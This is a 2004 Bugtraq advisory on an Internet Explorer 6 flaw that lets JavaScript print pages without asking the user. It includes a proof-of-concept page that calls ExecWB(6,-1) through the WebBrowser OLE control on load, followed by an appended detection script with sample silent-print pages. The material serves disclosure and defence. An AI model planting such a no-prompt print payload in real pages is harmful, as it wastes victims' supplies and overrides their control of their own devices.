Bugtraq mailing list archives
IE 6 Print Without Prompt
From: Ben Garvey <bengarvey () comcast net>
Date: Mon, 12 Apr 2004 10:45:20 -0400
#######################################################################
Ben Garvey

Application:  Microsoft Internet Explorer
Versions:     6.0
Platforms:    Windows
Bugs:         IE 6 allows JavaScript to send documents to the printer without prompting the user.
Exploitation: Client
Date:         12 April 2004
Author:       Ben Garvey
              bengarvey () comcast net
              http://www.bengarvey.com

Bugtraq report format: Thanks Luigi Auriemma!
#######################################################################

===============
1) Introduction
===============

Microsoft Internet Explorer is the dominant web browser on the world's PCs. Any exploits or bugs found in it hurt millions of users. Like anyone here needed to know that or is surprised.

#######################################################################

===============
2) Bug summary
===============

Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious document to send pages to the printer without prompting the user. Printing documents without prompting the user could waste paper, toner and ink, or damage the printer. If inserted into a high traffic website this waste could be substantial.

$ of paper x printed sheets x web traffic x % of IE users = $total waste in paper

If paper costs a penny per sheet ($5 for 500 sheets),
we average about 10 sheets printed per user before they realize what's happening (conservative estimate),
it's used on a high traffic website (1 million unique visitors),
and IE's market share is about 90%:

$0.01 x 10 per user x 1 million x 0.90 = $90,000 in damages

This doesn't even include costs associated with toner and time.

===============
3) Exploit
===============

The following is an example of the exploit. The offending line must be uncommented to activate it. Remove any linebreaks that break the JavaScript.
<HTML>
<HEAD>
<SCRIPT language="JavaScript">
function ieExecWB( intOLEcmd, intOLEparam )
{
  // Create OLE Object
  var WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0 CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';

  // Place Object on page
  document.body.insertAdjacentHTML('beforeEnd', WebBrowser);

  // if intOLEparam is not defined, set it
  if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || ( intOLEparam > 1) )
    intOLEparam = 1;

  // Execute Object
  WebBrowser1.ExecWB( intOLEcmd, intOLEparam );

  // Destroy Object
  WebBrowser1.outerHTML = "";
}

function printAll()
{
  // Uncomment this to enable the exploit!
  //ieExecWB(6,-1);
}
</SCRIPT>
</HEAD>
<BODY onload="printAll()">
<h3>I like your PRINTER</h3>
</BODY>
</HTML>

===============
4) Conclusion
===============

I can't think of any reasonable use for allowing IE to print stuff without my permission.
This bug should be fixed as soon as possible.

-----
Ben Garvey
bengarvey () comcast net
http://www.bengarvey.com
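As an added, defender-side example that is not part of the original advisory: a content-filter check that flags HTML embedding the WebBrowser control (the CLSID from the advisory) together with an ExecWB print command (6) whose option is anything other than 1, the value that shows the print dialog. The constant names follow the OLECMDID/OLECMDEXECOPT enums; the sample pages are constructed here.

```javascript
// Added example, not part of the original advisory: a content-filter check that flags HTML
// which embeds the WebBrowser control and calls ExecWB with the print command and no prompt.
const WEBBROWSER_CLSID = '8856F961-340A-11D0-A96B-00C04FD705A2'; // CLSID from the advisory
const OLECMDID_PRINT = 6;            // first ExecWB argument in the advisory (print)
const OLECMDEXECOPT_PROMPTUSER = 1;  // the option value that shows the print dialog

// Strip HTML, block and line comments (a commented-out call, as in the posted sample, must
// not fire) and collapse whitespace so a call split across lines still matches.
function normalize(html) {
  return html
    .replace(/<!--[\s\S]*?-->/g, ' ')
    .replace(/\/\*[\s\S]*?\*\//g, ' ')
    .replace(/(^|[^:])\/\/.*$/gm, '$1 ')   // leaves "http://" intact
    .replace(/\s+/g, ' ');
}

// Analyze one HTML document. `suspicious` needs all three ingredients: the control is
// embedded, ExecWB is called, and a literal (6, <non-prompt option>) argument pair appears.
function analyzeSilentPrint(html) {
  const text = normalize(html);
  const embedsWebBrowser = new RegExp('CLSID:' + WEBBROWSER_CLSID, 'i').test(text);
  const callsExecWB = /\bExecWB\s*\(/i.test(text);
  // Literal pairs such as (6,-1) or (6, 2); arguments passed through variables are not
  // resolved, which keeps the check cheap but heuristic.
  const pairRe = new RegExp('\\(\\s*' + OLECMDID_PRINT + '\\s*,\\s*(-?\\d+)\\s*\\)', 'g');
  const silentOptions = [];
  for (const m of text.matchAll(pairRe)) {
    const opt = Number(m[1]);
    if (opt !== OLECMDEXECOPT_PROMPTUSER) silentOptions.push(opt);
  }
  return {
    embedsWebBrowser,
    callsExecWB,
    silentOptions,
    suspicious: embedsWebBrowser && callsExecWB && silentOptions.length > 0,
  };
}

// Constructed sample pages modelled on the advisory's markup (not taken from a real site).
const CONTROL = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0 ' +
  'CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';
function samplePage(scriptBody) {
  return '<HTML><BODY onload="p()">' + CONTROL +
    '<SCRIPT>\nfunction p(){\n' + scriptBody + '\n}\n</SCRIPT></BODY></HTML>';
}
const SILENT_PAGE    = samplePage('  WebBrowser1.ExecWB(6,\n    -1);');  // no prompt, call split over lines
const COMMENTED_PAGE = samplePage('  // WebBrowser1.ExecWB(6, -1);');   // disabled, as in the posted sample
const PROMPT_PAGE    = samplePage('  WebBrowser1.ExecWB(6, 1);');       // prints via the normal dialog
```

The same three-ingredient rule can be expressed as a proxy or IDS content signature; the comment stripping matters because the advisory's own sample ships with the call commented out.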